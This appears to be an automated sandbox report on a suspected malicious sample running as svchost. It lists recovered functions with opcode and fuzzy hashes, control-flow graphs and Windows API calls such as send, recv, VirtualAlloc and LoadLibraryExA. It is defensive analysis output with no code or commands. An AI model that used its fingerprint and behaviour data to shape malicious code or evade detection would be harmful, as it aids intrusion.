                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CountTickrecv
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1874678310-0
                                                                                                                                                                                                                                                          • Opcode ID: 6b4986c91a39f45b3505869805ead1539d7754d72571547b31f3d810936fcdc1
                                                                                                                                                                                                                                                          • Instruction ID: 449e92a0b18f183db0f7345c8df75c2f30566562dbb85a03ceabff6c1882a85f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b4986c91a39f45b3505869805ead1539d7754d72571547b31f3d810936fcdc1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B821F274900299EFEF10CFA4D4447AE7BF1AF04309F108559E8456B281D7B6AA94DB92
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 313 40010e0-40010ea 314 40010f2-40010f4 313->314 315 40010ec-40010f0 313->315 317 400114d-4001150 314->317 315->314 316 40010f6 315->316 318 40010fd-4001101 316->318 319 4001103-4001120 send 318->319 320 400113a-400114b send 318->320 321 4001122-4001124 319->321 322 4001126-4001138 319->322 320->317 321->317 322->318
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • send.WS2_32(?,00000000,?,00000000), ref: 04001114
                                                                                                                                                                                                                                                          • send.WS2_32(?,00000000,00000000,00000000), ref: 04001146
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: send
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2809346765-0
                                                                                                                                                                                                                                                          • Opcode ID: b2e598ef71c8ac5d0c56a500729e24b321e62eb8f582e8b020920d41a4434bf5
                                                                                                                                                                                                                                                          • Instruction ID: 7140d396e4fa338b1c45032ebff5f33e510887e1da457bfc48643044175dbf3e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2e598ef71c8ac5d0c56a500729e24b321e62eb8f582e8b020920d41a4434bf5
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80012234A00348FBEF14CFA8D845BEE77B4AB44318F10C658E9656B2C0D7B6A651EB91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 323 40013b0-40013c1 324 4001421-4001427 323->324 325 40013c3-40013c7 323->325 325->324 326 40013c9-40013d0 325->326 327 40013db-40013e1 326->327 328 4001411-400141a 327->328 329 40013e3-400140f QueryPerformanceCounter Sleep 327->329 328->324 330 40013d2-40013d8 329->330 330->327
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 040013E7
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000), ref: 040013EF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2875609808-0
                                                                                                                                                                                                                                                          • Opcode ID: a7db8480fdc823d777aef3822c45b88b551d9c425098c02d9d2f571069091408
                                                                                                                                                                                                                                                          • Instruction ID: 9d74403c1c2c7bb1751bbbba9dc0b5917814bf527727232baae25755bbc2d242
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7db8480fdc823d777aef3822c45b88b551d9c425098c02d9d2f571069091408
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18011A30904208EBEB01CF98D494BEDBBB1FF44308F14C098E9496B381D379AA84CB81
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 331 4011cd-4011e4 332 401253-401255 331->332 333 4011e6-4011e9 331->333 334 4011ea-4011ef 333->334 335 4011f1-401204 LoadLibraryExA 334->335 336 40124a-40124f 334->336 335->332 337 401206-40120d 335->337 336->332 338 401212-401218 337->338 339 40120f 337->339 340 40121b-40121f 338->340 339->338 341 401221-401224 340->341 342 401226-40122b 340->342 341->334 343 401235 342->343 344 40122d-401233 342->344 345 40123a-401248 343->345 344->345 345->340
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 004011FC
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2742849059.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                          • Opcode ID: 1d8c67a6fd8a031ce9178923ff6fa604b01da3edc277bbd736844eb450087ab7
                                                                                                                                                                                                                                                          • Instruction ID: 35013e2e2bdfb2c25cf3a4b33a37da36620c85c937569e224cb1d264aff8bf43
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d8c67a6fd8a031ce9178923ff6fa604b01da3edc277bbd736844eb450087ab7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B5114872944205AFDF10CF44C8C0B9A37A4AF15354F2981B9EC19FB3A2D374EE148B99
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 00401144
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2742849059.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_400000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                                          • Opcode ID: f46dcd975488781c9cddb351eca70577c1689cc1756a23961b888947e9d6707a
                                                                                                                                                                                                                                                          • Instruction ID: 6f389262607e94f6ca6fd2432eff30f66c048e0178ed9f8f27be01fdfe11bbb9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f46dcd975488781c9cddb351eca70577c1689cc1756a23961b888947e9d6707a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02115E32600615ABCB21DF64CD81B8BB7F4AF09324F144469AA1ABB691D771FA00DB88
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _strcpy_s$_memset
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 987253425-0
                                                                                                                                                                                                                                                          • Opcode ID: 44218adf272bf707b1ed20d16bc8d9ad3aaffc81e79ba637950d93952a6c6a75
                                                                                                                                                                                                                                                          • Instruction ID: 6ffbbe254bd13291fa03b93f874eca1d4a54b98d90e1905f46e8f856855b0833
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44218adf272bf707b1ed20d16bc8d9ad3aaffc81e79ba637950d93952a6c6a75
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC7172B6E04208FBDF50DF94EC818DEB7B4AB4A609F20C459F90976290D135BA48EB56
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: H
                                                                                                                                                                                                                                                          • API String ID: 0-2852464175
                                                                                                                                                                                                                                                          • Opcode ID: 1096477fb5db0565c6f2c143114047529f305e68e65e65c6dd9e52626ccf8a70
                                                                                                                                                                                                                                                          • Instruction ID: 67b441bc6219ad25058a7dc751711c58666b968fd0b66db19d5699bc980d0709
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1096477fb5db0565c6f2c143114047529f305e68e65e65c6dd9e52626ccf8a70
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FF119B8E00218DFEB14DFA8D990B9DB7B1FF48308F248199D909AB361D771A985CF41
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset
                                                                                                                                                                                                                                                          • String ID: <
                                                                                                                                                                                                                                                          • API String ID: 2102423945-4251816714
                                                                                                                                                                                                                                                          • Opcode ID: fd79b48e9fbb9cb9cfac3a3da6eef3a913ec469d5d91857583c19bc0bafd63dd
                                                                                                                                                                                                                                                          • Instruction ID: 265d75645d11992da4b2f1f59cc45b6cd644182446f2ee9bce3e1a8d4e2d5750
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd79b48e9fbb9cb9cfac3a3da6eef3a913ec469d5d91857583c19bc0bafd63dd
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D11209B5A012289FEB64DF54CD88BEEB7B9BB48704F1041D9E609B7280D7746AC4CF58
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memcmp
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2931989736-0
                                                                                                                                                                                                                                                          • Opcode ID: 4ab6c835b3a8d386f7d6cb5b157b7cd7d659ba90d45b0f81057a5aa373f928b3
                                                                                                                                                                                                                                                          • Instruction ID: 1232f30742209602bb969d2521b285a9e46184637cee8bf4b984800216b21bdb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ab6c835b3a8d386f7d6cb5b157b7cd7d659ba90d45b0f81057a5aa373f928b3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0EF125B0E04219DFDB14DFA8D894BEEBBB1BF48308F148119E415BB2A5D774AA41CF91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: codecvt
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3662085145-0
                                                                                                                                                                                                                                                          • Opcode ID: 481a094063eea0996d580fe575330a3dfc80b192d07c727697d1ca0252fb713b
                                                                                                                                                                                                                                                          • Instruction ID: a3cb5fddb2616e01ffbd0549c63a57f7e4090b46a873f7d090d06a3cf8222b0d
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 481a094063eea0996d580fe575330a3dfc80b192d07c727697d1ca0252fb713b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5E18374A00328DFDB58CF94D998BADBBB2BF49308F244159D8096B391D776AD86CF40
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 97f17c946a3c54a9cad3e83d6fdf94190c77b8b4620ad00b5b108f5948b5f234
                                                                                                                                                                                                                                                          • Instruction ID: a5d7251e2747225a00ddcb09f2389310aff70beb4688250c6b3f934d2e6ae519
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97f17c946a3c54a9cad3e83d6fdf94190c77b8b4620ad00b5b108f5948b5f234
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0491C6B4E00229EFDB08DF94D594BAEBBB1BF88308F148059E9157B390DB75A941CF91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 04021A91
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 04021AB5
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 04021B49
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 04021B62
                                                                                                                                                                                                                                                            • Part of subcall function 040217B0: _memset.LIBCMT ref: 040217EA
                                                                                                                                                                                                                                                            • Part of subcall function 040217B0: _memset.LIBCMT ref: 04021800
                                                                                                                                                                                                                                                            • Part of subcall function 040217B0: _memset.LIBCMT ref: 0402181A
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset
                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                          • API String ID: 2102423945-2766056989
                                                                                                                                                                                                                                                          • Opcode ID: e94b19ba0fcb669e4e0cbc5759ced8619370a39b6899ccf5e07f60b5a10fbc88
                                                                                                                                                                                                                                                          • Instruction ID: 01bcd26e004969603b563e094358f1b64e43344fbc446aa7b287e43a94b7a553
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e94b19ba0fcb669e4e0cbc5759ced8619370a39b6899ccf5e07f60b5a10fbc88
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B715EB4E002089BEB10DB94DD45BEDB7B5BF48308F5041A8E609BB2C1D6766E55CF68
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04013479
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::_std::_
                                                                                                                                                                                                                                                          • String ID: $oB
                                                                                                                                                                                                                                                          • API String ID: 370429920-3132252410
                                                                                                                                                                                                                                                          • Opcode ID: 3f042deba27dbb9a6c53589dfe86891ceed2fc21ea38daa22f1df265e620214e
                                                                                                                                                                                                                                                          • Instruction ID: ff111addb76ca9d35d31a8907435c4d95596588a54556616c049ff3552255213
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f042deba27dbb9a6c53589dfe86891ceed2fc21ea38daa22f1df265e620214e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5651FDB5E00218DFEB14DF98D984A9DB7B5FF48308F508169D9096B351D771B944CF81
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::__memset_strlenstd::_
                                                                                                                                                                                                                                                          • String ID: pB$XpB
                                                                                                                                                                                                                                                          • API String ID: 3713721629-2178088481
                                                                                                                                                                                                                                                          • Opcode ID: b650810ef28b1162b20fb2bb24cf354fa744417f5b86810a3d7f07fcca2c8c7f
                                                                                                                                                                                                                                                          • Instruction ID: caac39b4c571324483d0a18a7aa4e44b6fb00a313373015349f42bda7133a820
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b650810ef28b1162b20fb2bb24cf354fa744417f5b86810a3d7f07fcca2c8c7f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A513EB1E04228DBEB24DF95DC44BEEB7B5BB88308F1041A9E509BB290D7756A84CF51
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset
                                                                                                                                                                                                                                                          • String ID: '$'
                                                                                                                                                                                                                                                          • API String ID: 2102423945-2527190458
                                                                                                                                                                                                                                                          • Opcode ID: a325690150a5eb3ed6ffc346bd302d07b89a03f3d19550fdf211c07dc6659787
                                                                                                                                                                                                                                                          • Instruction ID: 53bb57586c5e39befda5455b8bbd06f4bf2bc56d3601b69197fc609fafef56d8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a325690150a5eb3ed6ffc346bd302d07b89a03f3d19550fdf211c07dc6659787
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C418171B04329EBEB20DFA0CC45FED77B4AB44704F804599B609BA1C0D7B5A644CF96
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                                                          • String ID: ,SB
                                                                                                                                                                                                                                                          • API String ID: 1628550938-3344058557
                                                                                                                                                                                                                                                          • Opcode ID: 3d3124fdb95e4bcea8cf975f9c6f5d5c3062870727a51910439b4630ff52904f
                                                                                                                                                                                                                                                          • Instruction ID: 993150cf3f8eb55d910a7a38cf2a2ebf2ab550eb7e4aba8557308306761a1f3f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d3124fdb95e4bcea8cf975f9c6f5d5c3062870727a51910439b4630ff52904f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F1193B1904B019EF720EF759801B99BBE0AF00318F50C51AD599A72D1C774A641CB59
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _memset_strnlen$_strlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1397555153-0
                                                                                                                                                                                                                                                          • Opcode ID: 245b28424be2591b61ab36919849ca7590a44cec909f559def13932347f90032
                                                                                                                                                                                                                                                          • Instruction ID: 9948d87256a1ab2e7e4c421ed80cf7a845357aae833f097959cef4c1dbbed60e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 245b28424be2591b61ab36919849ca7590a44cec909f559def13932347f90032
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FB17B75E012499FDB14CF90C881BEEF7B1EF48308F14C19AE8596B391D634AA86CF91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: _strlen
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4218353326-0
                                                                                                                                                                                                                                                          • Opcode ID: 589d3e65630ef34cec759d841c4f9ee093c734cc23f38093e9c684df022fd702
                                                                                                                                                                                                                                                          • Instruction ID: b4162b3583ba2dec2d6c765e4cdbb5ffec497666bde8b264905ccdcb2170b9d4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 589d3e65630ef34cec759d841c4f9ee093c734cc23f38093e9c684df022fd702
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB81D3B4E01209DBDF04CF98D984AEEB7B2BF48308F2485A9E41577390E735AA45DF91
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2747666121.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2747666121.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: codecvt
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3662085145-0
                                                                                                                                                                                                                                                          • Opcode ID: ba7dc1fef3d58b80a497ec6308a1d58d0225431825f13d715bb00c9403d7ea51
                                                                                                                                                                                                                                                          • Instruction ID: 8ef4f0843c548fec2a10bde5c14a40ad8c72f7d7392924089e823b54c74d7b66
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba7dc1fef3d58b80a497ec6308a1d58d0225431825f13d715bb00c9403d7ea51
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E891C774A00208EFDB54DF94C894B9DBBB2FF48354F608259E9156B3A0D775EA82CF90
                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 040115EE
                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04011615
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 04011661
                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0401176E
